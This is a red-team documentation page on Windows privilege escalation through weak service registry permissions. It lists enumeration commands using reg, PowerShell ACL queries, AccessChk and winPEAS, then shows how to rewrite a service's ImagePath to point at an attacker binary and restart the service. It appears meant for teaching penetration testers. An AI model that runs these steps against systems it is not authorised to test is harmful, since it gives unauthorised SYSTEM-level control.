> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/redteam/privilege-escalation/windows/services/weak-registry-permissions.md). # Weak Registry Permissions ## Theory By hijacking the Registry entries utilized by services, attackers can run their malicious payloads. Attackers may use weaknesses in registry permissions to divert from the initially stated executable to one they control upon Service start, allowing them to execute their unauthorized malware. ## Practice An attacker can leverage this misconfiguration to modify the ImagePath of service with the path of the custom malicious executable that will give an escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). {% tabs %} {% tab title="Enumerate" %} We can check our permissions over services registry using one of the following methods: **CMD** ```powershell #Get the binary paths of the services reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Try to write every service with its current content (to check if you have write permissions) for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a ``` **Powershell** ```powershell #With PowerShell get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\ | fl ``` **AccessChk** Alternativly, we can use [AccessChk](https://learn.microsoft.com/fr-fr/sysinternals/downloads/accesschk) from sysinternals tools to enum permissions over services. ```powershell #List rights for authenticated users on registry accesschk64.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services #List everyone rights on registry accesschk64.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services #List everyone rights on specific service registry accesschk64.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services\ ``` **winPEAS** Or we can use the `servicesinfo` module of [WinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) ```powershell winPEASx64.exe servicesinfo ``` {% endtab %} {% tab title="Exploit" %} To change the path of th binary ```powershell reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f ``` And then, restart the service ```powershell #Using wmic wmic service call stopservice wmic service call startservice #Using net net stop && net start #Using sc.exe sc stop sc start ``` {% endtab %} {% endtabs %} ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/redteam/privilege-escalation/windows/services/weak-registry-permissions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.